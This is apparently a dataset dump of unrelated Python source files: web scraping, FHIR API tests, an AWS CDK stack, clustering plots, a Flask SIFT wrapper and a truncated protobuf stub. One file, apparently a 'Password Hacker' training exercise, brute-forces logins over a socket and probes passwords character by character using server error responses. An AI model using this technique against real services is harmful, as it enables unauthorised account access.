text stringlengths 8 6.05M |
|---|
from rest_framework import authentication
class BasicAuthentication(authentication.BasicAuthentication):
def authenticate_credentials(self, userid, password, request=None):
if "@" in userid:
userid, domain = userid.split("@")
print(userid, domain)
return super().authenticate_credentials(userid, password, request)
|
d = {'key': [1,2,3]}
x = d['key']
x.append(1)
print(d) |
import requests
from bs4 import BeautifulSoup
url = 'http://servicos2.sjc.sp.gov.br/servicos/horario-e-itinerario.aspx?acao=p&opcao=1&txt='
request = requests.get(url)
soup = BeautifulSoup(request.text, 'lxml')
lista_all = soup.find_all('table', class_='textosm')
url = 'http://servicos2.sjc.sp.gov.br'
for lista_td in lista_all:
lista = lista_td.find_all('td')
for lista_data in lista:
if lista_data.next_element.name== 'a':
url_it = '{0}{1}'.format(url, lista_data.next_element.get('href'))
print(url_it)
else:
print(lista_data.next_element) |
import pytest
import pdb
from fhireval.test_suite.crud import prep_server
test_id = f"{'2.2.11':<10} - CRUD Document Reference"
test_weight = 2
# Cache the ID to simplify calls made after crate
example_document_ref_id = None
def test_create_research_document_ref(host, prep_server):
global example_document_ref_id
# pdb.set_trace()
example_patient = prep_server['CMG-Examples']['Patient'][0]
response = host.post('Patient', example_patient, validate_only=False)
example_patient_id = response['response']['id']
example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
example_document_ref['subject'][
'reference'] = f"Patient/{example_patient_id}"
response = host.post('DocumentReference', example_document_ref, validate_only=False)
assert response['status_code'] == 201, 'CREATE success'
example_document_ref_id = response['response']['id']
def test_read_research_document_ref(host, prep_server):
global example_document_ref_id
example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
document_ref_query = host.get(f"DocumentReference/{example_document_ref_id}").entries
assert len(document_ref_query) == 1, "READ Success and only one was found"
# Just make sure we got what we expected
assert example_document_ref['status'] == document_ref_query[0]['status'], 'Verify Identifier matches'
assert example_document_ref['content'][0]['attachment']['url'] == document_ref_query[0]['content'][0]['attachment'][
'url']
def test_update_research_document_ref(host, prep_server):
global example_document_ref_id
example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
altered_document_ref = example_document_ref.copy()
altered_document_ref['content'][0]['attachment']['url'] = 'drs:example.com/12/23/45'
altered_document_ref['id'] = example_document_ref_id
result = host.update('DocumentReference', example_document_ref_id, altered_document_ref)
assert result['status_code'] == 200
document_ref_qry = host.get(f"DocumentReference/{example_document_ref_id}").entries
assert len(document_ref_qry) == 1, "READ success and only one was found"
assert document_ref_qry[0]['content'][0]['attachment']['url'] == 'drs:example.com/12/23/45'
def test_patch_research_document_ref(host, prep_server):
global example_document_ref_id
example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
patch_ops = [{"op": "replace", "path": "/status", "value": "superseded"}]
result = host.patch('DocumentReference', example_document_ref_id, patch_ops)
assert result['status_code'] == 200
document_ref_qry = result['response']
assert document_ref_qry['status'] == 'superseded'
def test_delete_research_document_ref(host, prep_server):
global example_document_ref_id
example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
delete_result = host.delete_by_record_id('DocumentReference', example_document_ref_id)
assert delete_result['status_code'] == 200
|
#!/usr/bin/env python3
import base64
from aws_cdk import (
aws_autoscaling as autoscaling,
aws_ec2 as ec2,
aws_elasticloadbalancingv2 as elbv2,
core,
)
"""
https://cloudacademy.com/blog/elastic-load-balancers-ec2-auto-scaling-to-support-aws-workloads/
"""
class LoadBalancerStack(core.Stack):
def __init__(self, app: core.App, id: str, **kwargs) -> None:
super().__init__(app, id, **kwargs)
env_name = self.node.try_get_context('env')
vpc = ec2.Vpc(self, id=f"{env_name}VPC")
data = open("./pr_stacks/httpd.sh", "rb").read()
httpd=ec2.UserData.for_linux()
httpd.add_commands(str(data,'utf-8'))
asg = autoscaling.AutoScalingGroup(
self,
id=f"{env_name}-ASG",
vpc=vpc,
instance_type=ec2.InstanceType.of(
ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO
),
machine_image=ec2.AmazonLinuxImage(generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2),
user_data=httpd,
min_capacity=2,
max_capacity=5
)
lb = elbv2.ApplicationLoadBalancer(
self, "LB",
vpc=vpc,
internet_facing=True)
"""
Listeners: For every load balancer, regardless of the type used,
you must configure at least one listener. The listener defines how your
inbound connections are routed to your target groups based on ports
and protocols set as conditions. The configurations of the listener
itself differ slightly depending on which ELB you have selected.
"""
listener = lb.add_listener(id=f"{env_name}-Listener", port=80)
"""
Target Groups: A target group is simply a group of your resources that
you want your ELB to route requests to, such as a fleet of EC2 instances.
You can configure the ELB with a number of different target groups, each
associated with a different listener configuration and associated rules.
This enables you to route traffic to different resources based upon the
type of request.
"""
listener.add_targets(id=f"{env_name}-Target", port=80, targets=[asg])
listener.connections.allow_default_port_from_any_ipv4(description="Open to the world")
asg.scale_on_request_count(id=f"{env_name}-AModestLoad", target_requests_per_second=1)
core.CfnOutput(self,"LoadBalancer",export_name="LoadBalancer",value=f"http://{lb.load_balancer_dns_name}")
|
import unittest
from fibonacciLists import nth_fib_lists
class TestsFibonacciLists(unittest.TestCase):
def test_nth_fib_lists_first(self):
self.assertEqual([1], nth_fib_lists([1], [2], 1))
def test_nth_fib_lists_second(self):
self.assertEqual([2], nth_fib_lists([1], [2], 2))
def test_nth_fib_lists_empty_lists(self):
self.assertEqual([], nth_fib_lists([], [], 59))
def test_nth_fib_lists_correct(self):
self.assertEqual([1, 2, 3, 1, 2, 3], nth_fib_lists([], [1, 2, 3], 4))
if __name__ == '__main__':
unittest.main()
|
import sys
import socket
import itertools
import json
import string
host = sys.argv[1]
port = int(sys.argv[2])
common_logins = [
login.rstrip() for login in
list(open("F:/code/Password Hacker/Password Hacker/task/hacking/logins.txt").readlines())]
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
client_socket = socket.socket()
address = (host, port)
state = False
client_socket.connect(address)
def get_login():
print("finding login...")
# For every login in the list, send to server as json data with empty password. When response is Wrong Password!
# return that login.
try:
for login in common_logins:
data = json.dumps({
"login": login,
"password": " "
})
client_socket.send(data.encode())
response = json.loads(client_socket.recv(
1024).decode(encoding='utf-8'))
if response == {"result": "Wrong password!"}:
print("login is: " + login)
return login
except Exception:
print("Exception occurred")
def get_password(login):
print("finding password...")
for character in characters:
try:
data = json.dumps({
"login": login,
"password": character
})
client_socket.send(data.encode())
response = json.loads(client_socket.recv(
1024).decode(encoding='utf-8'))
if response.get('result') == 'Exception happened during login':
print("first character is: " + character)
except Exception as e:
print(e)
user_login = get_login()
get_password(user_login)
client_socket.close()
|
import csv
import matplotlib.pyplot as plt
from statistics import mean
import numpy as np
def count_lap():
count_1, count_2, count_3, count_4, count_5 = [], [], [], [],[]
count_6, count_7, count_8, count_9 = [],[],[],[]
dyn_1, dyn_2, dyn_3, dyn_4, dyn_5, = [],[],[],[],[]
dyn_6, dyn_7, dyn_8, dyn_9 = [],[],[],[]
count = []
for i in range(1,10):
f = i/10
with open('data cluster fix'+str(f)+'.csv', 'r') as csvnew:
read = csv.reader(csvnew)
for line in read:
if f == 0.1:
count_1.append(list(map(float, line[0:2])))
elif f == 0.2:
count_2.append(list(map(float, line[0:2])))
elif f == 0.3:
count_3.append(list(map(float, line[0:2])))
elif f == 0.4:
count_4.append(list(map(float, line[0:2])))
elif f == 0.5:
count_5.append(list(map(float, line[0:2])))
elif f == 0.6:
count_6.append(list(map(float, line[0:2])))
elif f == 0.7:
count_7.append(list(map(float, line[0:2])))
elif f == 0.8:
count_8.append(list(map(float, line[0:2])))
elif f == 0.9:
count_9.append(list(map(float, line[0:2])))
with open('data cluster dynamic '+str(f)+'.csv', 'r') as csvnew:
read = csv.reader(csvnew)
for line in read:
if f == 0.1:
dyn_1.append(list(map(float, line[0:2])))
elif f == 0.2:
dyn_2.append(list(map(float, line[0:2])))
elif f == 0.3:
dyn_3.append(list(map(float, line[0:2])))
elif f == 0.4:
dyn_4.append(list(map(float, line[0:2])))
elif f == 0.5:
dyn_5.append(list(map(float, line[0:2])))
elif f == 0.6:
dyn_6.append(list(map(float, line[0:2])))
elif f == 0.7:
dyn_7.append(list(map(float, line[0:2])))
elif f == 0.8:
dyn_8.append(list(map(float, line[0:2])))
elif f == 0.9:
dyn_9.append(list(map(float, line[0:2])))
count_1.sort()
count_2.sort()
count_3.sort()
count_4.sort()
count_5.sort()
count_6.sort()
count_7.sort()
count_8.sort()
count_9.sort()
count_1.append(['','',''])
count_2.append(['','',''])
count_3.append(['','',''])
count_4.append(['','',''])
count_5.append(['','',''])
count_6.append(['','',''])
count_7.append(['','',''])
count_8.append(['','',''])
count_9.append(['','',''])
dyn_1.sort()
dyn_2.sort()
dyn_3.sort()
dyn_4.sort()
dyn_5.sort()
dyn_6.sort()
dyn_7.sort()
dyn_8.sort()
dyn_9.sort()
dyn_1.append(['','',''])
dyn_2.append(['','',''])
dyn_3.append(['','',''])
dyn_4.append(['','',''])
dyn_5.append(['','',''])
dyn_6.append(['','',''])
dyn_7.append(['','',''])
dyn_8.append(['','',''])
dyn_9.append(['','',''])
return count, count_1, count_2, count_3, count_4, count_5, count_6, count_7, count_8, count_9,\
dyn_1, dyn_2, dyn_3, dyn_4, dyn_5, dyn_6, dyn_7, dyn_8, dyn_9
def dfix_1(count_1):
count, r, avg_rfix1 = 0, 0, []
for index in range(len(count_1)-1):
if count_1[index][0] == count_1[index+1][0]:
count += 1
r += count_1[index][1]
elif count_1[index][0] != count_1[index+1][0] and count != 0:
avg_rfix1.append(r/count)
count, r = 0, 0
return avg_rfix1
def dfix_2(count_2):
count, r, avg_rfix2 = 0, 0, []
for index in range(len(count_2)-1):
if count_2[index][0] == count_2[index+1][0]:
count += 1
r += count_2[index][1]
elif count_2[index][0] != count_2[index+1][0] and count != 0:
avg_rfix2.append(r/count)
count, r = 0, 0
return avg_rfix2
def dfix_3(count_3):
count, r, avg_rfix3 = 0, 0, []
for index in range(len(count_3)-1):
if count_3[index][0] == count_3[index+1][0]:
count += 1
r += count_3[index][1]
elif count_3[index][0] != count_3[index+1][0] and count != 0:
avg_rfix3.append(r/count)
count, r = 0, 0
return avg_rfix3
def dfix_4(count_4):
count, r, avg_rfix4 = 0, 0, []
for index in range(len(count_4)-1):
if count_4[index][0] == count_4[index+1][0]:
count += 1
r += count_4[index][1]
elif count_4[index][0] != count_4[index+1][0] and count != 0:
avg_rfix4.append(r/count)
count, r = 0, 0
return avg_rfix4
def dfix_5(count_5):
count, r, avg_rfix5 = 0, 0, []
for index in range(len(count_5)-1):
if count_5[index][0] == count_5[index+1][0]:
count += 1
r += count_5[index][1]
elif count_5[index][0] != count_5[index+1][0] and count != 0:
avg_rfix5.append(r/count)
count, r = 0, 0
return avg_rfix5
def dfix_6(count_6):
count, r, avg_rfix6 = 0, 0, []
for index in range(len(count_6)-1):
if count_6[index][0] == count_6[index+1][0]:
count += 1
r += count_6[index][1]
elif count_6[index][0] != count_6[index+1][0] and count != 0:
avg_rfix6.append(r/count)
count, r = 0, 0
return avg_rfix6
def dfix_7(count_7):
count, r, avg_rfix7 = 0, 0, []
for index in range(len(count_7)-1):
if count_7[index][0] == count_7[index+1][0]:
count += 1
r += count_7[index][1]
elif count_7[index][0] != count_7[index+1][0] and count != 0:
avg_rfix7.append(r/count)
count, r = 0, 0
return avg_rfix7
def dfix_8(count_8):
count, r, avg_rfix8 = 0, 0, []
for index in range(len(count_8)-1):
if count_8[index][0] == count_8[index+1][0]:
count += 1
r += count_8[index][1]
elif count_8[index][0] != count_8[index+1][0] and count != 0:
avg_rfix8.append(r/count)
count, r = 0, 0
return avg_rfix8
def dfix_9(count_9):
count, r, avg_rfix9 = 0, 0, []
for index in range(len(count_9)-1):
if count_9[index][0] == count_9[index+1][0]:
count += 1
r += count_9[index][1]
elif count_9[index][0] != count_9[index+1][0] and count != 0:
avg_rfix9.append(r/count)
count, r = 0, 0
return avg_rfix9
def dynamic_1(dyn_1):
count, r, avg_dyn1 = 0, 0, []
for index in range(len(dyn_1)-1):
if dyn_1[index][0] == dyn_1[index+1][0]:
count += 1
r += dyn_1[index][1]
elif dyn_1[index][0] != dyn_1[index+1][0] and count != 0:
avg_dyn1.append(r/count)
count, r = 0, 0
return avg_dyn1
def dynamic_2(dyn_2):
count, r, avg_dyn2 = 0, 0, []
for index in range(len(dyn_2)-1):
if dyn_2[index][0] == dyn_2[index+1][0]:
count += 1
r += dyn_2[index][1]
elif dyn_2[index][0] != dyn_2[index+1][0] and count != 0:
avg_dyn2.append(r/count)
count, r = 0, 0
return avg_dyn2
def dynamic_3(dyn_3):
count, r, avg_dyn3 = 0, 0, []
for index in range(len(dyn_3)-1):
if dyn_3[index][0] == dyn_3[index+1][0]:
count += 1
r += dyn_3[index][1]
elif dyn_3[index][0] != dyn_3[index+1][0] and count != 0:
avg_dyn3.append(r/count)
count, r = 0, 0
return avg_dyn3
def dynamic_4(dyn_4):
count, r, avg_dyn4 = 0, 0, []
for index in range(len(dyn_4)-1):
if dyn_4[index][0] == dyn_4[index+1][0]:
count += 1
r += dyn_4[index][1]
elif dyn_4[index][0] != dyn_4[index+1][0] and count != 0:
avg_dyn4.append(r/count)
count, r = 0, 0
return avg_dyn4
def dynamic_5(dyn_5):
count, r, avg_dyn5 = 0, 0, []
for index in range(len(dyn_5)-1):
if dyn_5[index][0] == dyn_5[index+1][0]:
count += 1
r += dyn_5[index][1]
elif dyn_5[index][0] != dyn_5[index+1][0] and count != 0:
avg_dyn5.append(r/count)
count, r = 0, 0
return avg_dyn5
def dynamic_6(dyn_6):
count, r, avg_dyn6 = 0, 0, []
for index in range(len(dyn_6)-1):
if dyn_6[index][0] == dyn_6[index+1][0]:
count += 1
r += dyn_6[index][1]
elif dyn_6[index][0] != dyn_6[index+1][0] and count != 0:
avg_dyn6.append(r/count)
count, r = 0, 0
return avg_dyn6
def dynamic_7(dyn_7):
count, r, avg_dyn7 = 0, 0, []
for index in range(len(dyn_7)-1):
if dyn_7[index][0] == dyn_7[index+1][0]:
count += 1
r += dyn_7[index][1]
elif dyn_7[index][0] != dyn_7[index+1][0] and count != 0:
avg_dyn7.append(r/count)
count, r = 0, 0
return avg_dyn7
def dynamic_8(dyn_8):
count, r, avg_dyn8 = 0, 0, []
for index in range(len(dyn_8)-1):
if dyn_8[index][0] == dyn_8[index+1][0]:
count += 1
r += dyn_8[index][1]
elif dyn_8[index][0] != dyn_8[index+1][0] and count != 0:
avg_dyn8.append(r/count)
count, r = 0, 0
return avg_dyn8
def dynamic_9(dyn_9):
count, r, avg_dyn9 = 0, 0, []
for index in range(len(dyn_9)-1):
if dyn_9[index][0] == dyn_9[index+1][0]:
count += 1
r += dyn_9[index][1]
elif dyn_9[index][0] != dyn_9[index+1][0] and count != 0:
avg_dyn9.append(r/count)
count, r = 0, 0
return avg_dyn9
def plot(avg_rfix1, avg_rfix2, avg_rfix3, avg_rfix4, avg_rfix5,\
avg_rfix6, avg_rfix7, avg_rfix8, avg_rfix9,\
avg_dyn1, avg_dyn2, avg_dyn3, avg_dyn4, avg_dyn5,\
avg_dyn6, avg_dyn7, avg_dyn8, avg_dyn9):
## all cluster till final round
plt.plot(avg_rfix1, label =' fix t predefine at 0.1')
plt.plot(avg_rfix2,label =' fix t predefine at 0.2')
plt.plot(avg_rfix3, label =' fix t predefine at 0.3')
plt.plot(avg_rfix4, label =' fix t predefine at 0.4')
plt.plot(avg_rfix5, label =' fix t predefine at 0.5')
plt.plot(avg_rfix6, label =' fix t predefine at 0.6')
plt.plot(avg_rfix7, label =' fix t predefine at 0.7')
plt.plot(avg_rfix8, label =' fix t predefine at 0.8')
plt.plot(avg_rfix9, label =' fix t predefine at 0.9')
plt.xlabel('round')
plt.ylabel('number of cluster')
plt.title("number of cluster in difference t_predefine value")
plt.legend()
plt.show()
# plt.plot(avg_dyn1, label =' dynamic t predefine at 0.1')
# plt.plot(avg_dyn2, label =' dynamic t predefine at 0.2')
# plt.plot(avg_dyn3, label =' dynamic t predefine at 0.3')
# plt.plot(avg_dyn4, label =' dynamic t predefine at 0.4')
# plt.plot(avg_dyn5, label =' dynamic t predefine at 0.5')
# plt.plot(avg_dyn6, label =' dynamic t predefine at 0.6')
# plt.plot(avg_dyn7, label =' dynamic t predefine at 0.7')
# plt.plot(avg_dyn8, label =' dynamic t predefine at 0.8')
# plt.plot(avg_dyn9, label =' dynamic t predefine at 0.9')
# plt.xlabel('round')
# plt.ylabel('number of cluster')
# plt.title("number of cluster in difference t_predefine value")
# plt.legend()
# plt.show()
#### just first ten round
## plt.plot(avg_rfix1[:10], label =' fix t predefine at 0.1')
## plt.plot(avg_rfix2[:10], label =' fix t predefine at 0.2')
## plt.plot(avg_rfix3[:10], label =' fix t predefine at 0.3')
## plt.plot(avg_rfix4[:10], label =' fix t predefine at 0.4')
## plt.plot(avg_rfix5[:10], label =' fix t predefine at 0.5')
## plt.plot(avg_rfix6[:10], label =' fix t predefine at 0.6')
## plt.plot(avg_rfix7[:10], label =' fix t predefine at 0.7')
## plt.plot(avg_rfix8[:10], label =' fix t predefine at 0.8')
## plt.plot(avg_rfix9[:10], label =' fix t predefine at 0.9')
## plt.plot(avg_dyn1[:10], label =' dynamic t predefine at 0.1')
## plt.plot(avg_dyn2[:10], label =' dynamic t predefine at 0.2')
## plt.plot(avg_dyn3[:10], label =' dynamic t predefine at 0.3')
## plt.plot(avg_dyn4[:10], label =' dynamic t predefine at 0.4')
## plt.plot(avg_dyn5[:10], label =' dynamic t predefine at 0.5')
## plt.plot(avg_dyn6[:10], label =' dynamic t predefine at 0.6')
## plt.plot(avg_dyn7[:10], label =' dynamic t predefine at 0.7')
## plt.plot(avg_dyn8[:10], label =' dynamic t predefine at 0.8')
## plt.plot(avg_dyn9[:10], label =' dynamic t predefine at 0.9')
## plt.xlabel('')
## plt.ylabel('number of cluster')
## plt.title("number of cluster in difference t_predefine value in first 10 round")
## plt.tight_layout()
## plt.legend()
## plt.show()
###### last 50 round
## plt.plot(avg_rfix1[len(avg_rfix9)-30:], label =' fix t predefine at 0.1')
## plt.plot(avg_rfix2[len(avg_rfix9)-30:], label =' fix t predefine at 0.2')
## plt.plot(avg_rfix3[len(avg_rfix9)-30:], label =' fix t predefine at 0.3')
## plt.plot(avg_rfix4[len(avg_rfix9)-30:], label =' fix t predefine at 0.4')
## plt.plot(avg_rfix5[len(avg_rfix9)-30:], label =' fix t predefine at 0.5')
## plt.plot(avg_rfix6[len(avg_rfix9)-30:], label =' fix t predefine at 0.6')
## plt.plot(avg_rfix7[len(avg_rfix9)-30:], label =' fix t predefine at 0.7')
## plt.plot(avg_rfix8[len(avg_rfix9)-30:], label =' fix t predefine at 0.8')
## plt.plot(avg_rfix9[len(avg_rfix9)-30:], label =' fix t predefine at 0.9')
## plt.plot(avg_dyn1[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.1')
## plt.plot(avg_dyn2[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.2')
## plt.plot(avg_dyn3[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.3')
## plt.plot(avg_dyn4[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.4')
## plt.plot(avg_dyn5[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.5')
## plt.plot(avg_dyn6[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.6')
## plt.plot(avg_dyn7[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.7')
## plt.plot(avg_dyn8[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.8')
## plt.plot(avg_dyn9[len(avg_rfix9)-30:], label =' dynamic t predefine at 0.9')
## plt.xlabel('')
## plt.ylabel('number of cluster')
## plt.title("number of cluster in difference t_predefine value in first 10 round")
## plt.tight_layout()
## plt.legend()
## plt.show()
## plt.plot(avg_rfix9[len(avg_rfix9)-30:])
## plt.show()
fig = 18
width = 0.25
ind = np.arange(fig)
first_round = [avg_rfix1[0],avg_rfix2[0],avg_rfix3[0],avg_rfix4[0],
avg_rfix5[0],avg_rfix6[0],avg_rfix7[0],avg_rfix8[0],avg_rfix9[0],\
avg_dyn1[0], avg_dyn2[0], avg_dyn3[0], \
avg_dyn4[0], avg_dyn5[0], avg_dyn6[0],\
avg_dyn7[0], avg_dyn8[0], avg_dyn8[0]]
max_round = [max(avg_rfix1),max(avg_rfix2),max(avg_rfix3),max(avg_rfix4),
max(avg_rfix5),max(avg_rfix6),max(avg_rfix7),max(avg_rfix8),\
max(avg_rfix9),\
max(avg_dyn1), max(avg_dyn2), max(avg_dyn3),\
max(avg_dyn4), max(avg_dyn5), max(avg_dyn6),\
max(avg_dyn7), max(avg_dyn8), max(avg_dyn9)]
min_round = [min(avg_rfix1),min(avg_rfix2),min(avg_rfix3),min(avg_rfix4),
min(avg_rfix5),min(avg_rfix6),min(avg_rfix7),min(avg_rfix8),min(avg_rfix9),\
min(avg_dyn1), min(avg_dyn2), min(avg_dyn3),\
min(avg_dyn4), min(avg_dyn5), min(avg_dyn6),\
min(avg_dyn7), min(avg_dyn8), min(avg_dyn9)]
mean_round = [mean(avg_rfix1),mean(avg_rfix2),mean(avg_rfix3),mean(avg_rfix4),
mean(avg_rfix5),mean(avg_rfix6),mean(avg_rfix7),mean(avg_rfix8),mean(avg_rfix9),\
mean(avg_dyn1), mean(avg_dyn2), mean(avg_dyn3),\
mean(avg_dyn4), mean(avg_dyn5), mean(avg_dyn6),\
mean(avg_dyn7), mean(avg_dyn8), mean(avg_dyn9)]
bar_1 = plt.bar(ind, max_round, width, label =' maximum round')
bar_3 = plt.bar(ind + width, mean_round, width, label =' average round')
bar_4 = plt.bar(ind + width + width, min_round, width, label =' minimum round')
plt.xticks(ind + width , ('fix 0.1', 'fix 0.2', 'fix 0.3', 'fix 0.4', 'fix 0.5', \
'fix 0.6', 'fix 0.7', 'fix 0.8', 'fix 0.9',\
'dyn 0.1', 'dyn 0.2', 'dyn 0.3', 'dyn 0.4', 'dyn 0.5', \
'dyn 0.6', 'dyn 0.7', 'dyn 0.8', 'dyn 0.9'))
for rect in bar_1+bar_3+bar_4:
height = rect.get_height()
plt.text(rect.get_x() + rect.get_width()/2.0, height, '%d' % int(height), ha='center', va='bottom')
plt.xlabel('')
plt.ylabel('number of cluster')
plt.title("number of cluster in difference t_predefine value")
plt.ylim(0,15)
plt.tight_layout()
plt.legend()
plt.show()
def run():
count, count_1, count_2, count_3, count_4, count_5, count_6, count_7, count_8, count_9,\
dyn_1, dyn_2, dyn_3, dyn_4, dyn_5, dyn_6, dyn_7, dyn_8, dyn_9 = count_lap()
avg_rfix1 = dfix_1(count_1)
avg_rfix2 = dfix_2(count_2)
avg_rfix3 = dfix_3(count_3)
avg_rfix4 = dfix_4(count_4)
avg_rfix5 = dfix_5(count_5)
avg_rfix6 = dfix_6(count_6)
avg_rfix7 = dfix_7(count_7)
avg_rfix8 = dfix_8(count_8)
avg_rfix9 = dfix_9(count_9)
avg_dyn1 = dynamic_1(dyn_1)
avg_dyn2 = dynamic_2(dyn_2)
avg_dyn3 = dynamic_3(dyn_3)
avg_dyn4 = dynamic_4(dyn_4)
avg_dyn5 = dynamic_5(dyn_5)
avg_dyn6 = dynamic_6(dyn_6)
avg_dyn7 = dynamic_7(dyn_7)
avg_dyn8 = dynamic_8(dyn_8)
avg_dyn9 = dynamic_9(dyn_9)
plot(avg_rfix1, avg_rfix3, avg_rfix3, avg_rfix4, avg_rfix5,\
avg_rfix6, avg_rfix7, avg_rfix8, avg_rfix9,\
avg_dyn1, avg_dyn2, avg_dyn3, avg_dyn4, avg_dyn5,\
avg_dyn6, avg_dyn7, avg_dyn8, avg_dyn9)
run()
|
import cv2
from numpy import *
import os
path = "/Users/myazdaniUCSD/Documents/Ten_Thousand_Pairs/found_pairs_source/"
write_path = '/Users/myazdaniUCSD/Documents/Ten_Thousand_Pairs/videos/'
image_paths = [os.path.join(path,f) for f in os.listdir(path) if f.endswith('.jpg')]
codec = cv2.cv.CV_FOURCC('m', 'p', '4', 'v')
#size = (int(img.shape[0]), int(img.shape[1]))
size = (184*5, 45*5)
#videoFile = cv2.VideoWriter();
#videoFile.open('MyOutputVid.mov', codec, 25, size,1)
fps = 7
videoWriter = cv2.VideoWriter(write_path+'EyePair_instagram_expanded_inter_lanczos4.mov', codec, fps, size, 1)
for image_path in image_paths:
img =cv2.imread(image_path)
resized = cv2.resize(img, size, interpolation = cv2.INTER_LANCZOS4)
videoWriter.write(resized)
|
#!/usr/bin/env python3
import os, subprocess, shutil, re
from flask import request, Blueprint, current_app as app, abort
from werkzeug.utils import secure_filename
from .handle_keypoints import handle_keypoints
execute = Blueprint('execute', __name__)
@execute.route('/execute', methods=['GET'])
def sift_cli():
# ---Arrange---
inputImagePath = app.config["ASSETS_FOLDER"] + '/' + request.args.get('inputImageName')
ss_noct = request.args.get('ss_noct')
ss_nspo = request.args.get('ss_nspo')
ss_dmin = request.args.get('ss_dmin')
ss_smin = request.args.get('ss_smin')
ss_sin = request.args.get('ss_sin')
thresh_dog = request.args.get('thresh_dog')
thresh_edge = request.args.get('thresh_edge')
ori_nbins = request.args.get('ori_nbins')
ori_thresh = request.args.get('ori_thresh')
ori_lambda = request.args.get('ori_lambda')
descr_nhist = request.args.get('descr_nhist')
descr_nori = request.args.get('descr_nori')
descr_lambda = request.args.get('descr_lambda')
verb_keys = request.args.get('verb_keys')
verb_ss = request.args.get('verb_ss')
sift_cli_params = \
[
"./demo_SIFT/bin/sift_cli", inputImagePath, # algorithm executable and input picture
"-ss_noct", ss_noct, # number of octaves
"-ss_nspo", ss_nspo, # number of scales per octave
"-ss_dmin", ss_dmin, # the sampling distance in the first octave
"-ss_smin", ss_smin, # blur level on the seed image
"-ss_sin", ss_sin, # assumed level of blur in the input image
"-thresh_dog", thresh_dog, # threshold over the DoG response
"-thresh_edge", thresh_edge, # threshold over the ratio of principal curvature
"-ori_nbins", ori_nbins, # number of bins in the orientation histogram
"-ori_thresh", ori_thresh, # threshold for considering local maxima in the orientation histogram
"-ori_lambda", ori_lambda, # sets how local is the analysis of the gradient distribution
"-descr_nhist", descr_nhist, # number of histograms per dimension
"-descr_nori", descr_nori, # number of bins in each histogram
"-descr_lambda", descr_lambda, # sets how local the descriptor is
]
# labels for output
res = check_output_directory()
if(verb_keys == "1"):
sift_cli_params.extend(["-verb_keys", verb_keys]) # flag to output the intermediary sets of keypoints
if(verb_ss == "1"):
sift_cli_params.extend(["-verb_ss", verb_keys]) # flag to output the scalespaces (Gaussian and DoG)
# ---Act---
process = subprocess.Popen(sift_cli_params, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if(stderr.decode("utf-8") != ''):
return stderr
elif(stdout.decode("utf-8") != ''):
features_string = stdout.decode("utf-8")
file = open("static/keypoints/features.txt", "a")
file.write(features_string)
file.close()
process = subprocess.Popen(["./demo_SIFT/bin/anatomy2lowe", "static/keypoints/features.txt"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if(stderr.decode("utf-8") != ''):
return stderr
elif(stdout.decode("utf-8") != ''):
features2lowe_string = stdout.decode("utf-8")
file = open("static/keypoints/features2lowe.txt", "a")
file.write(stdout.decode("utf-8"))
file.close()
return handle_keypoints(features2lowe_string, inputImagePath)
abort(400, "Can't convert keypoints by execute features2lowe")
else:
return handle_keypoints("", inputImagePath)
def check_output_directory():
try:
shutil.rmtree('static/scalespace', ignore_errors = True, onerror = None)
shutil.rmtree('static/dog', ignore_errors = True, onerror = None)
shutil.rmtree('static/keypoints', ignore_errors = True, onerror = None)
os.makedirs('static/scalespace')
os.makedirs('static/dog')
os.makedirs('static/keypoints')
except Exception as e:
return(e)
|
# @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,
FileDescriptor as google___protobuf___descriptor___FileDescriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from opentelemetry.proto.common.v1.common_pb2 import (
AttributeKeyValue as opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue,
InstrumentationLibrary as opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary,
)
from opentelemetry.proto.resource.v1.resource_pb2 import (
Resource as opentelemetry___proto___resource___v1___resource_pb2___Resource,
)
from typing import (
Iterable as typing___Iterable,
List as typing___List,
NewType as typing___NewType,
Optional as typing___Optional,
Text as typing___Text,
Tuple as typing___Tuple,
Union as typing___Union,
cast as typing___cast,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
builtin___str = str
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
DESCRIPTOR: google___protobuf___descriptor___FileDescriptor = ...
class ResourceSpans(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def resource(self) -> opentelemetry___proto___resource___v1___resource_pb2___Resource: ...
@property
def instrumentation_library_spans(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___InstrumentationLibrarySpans]: ...
def __init__(self,
*,
resource : typing___Optional[opentelemetry___proto___resource___v1___resource_pb2___Resource] = None,
instrumentation_library_spans : typing___Optional[typing___Iterable[type___InstrumentationLibrarySpans]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> ResourceSpans: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> ResourceSpans: ...
def HasField(self, field_name: typing_extensions___Literal[u"resource",b"resource"]) -> builtin___bool: ...
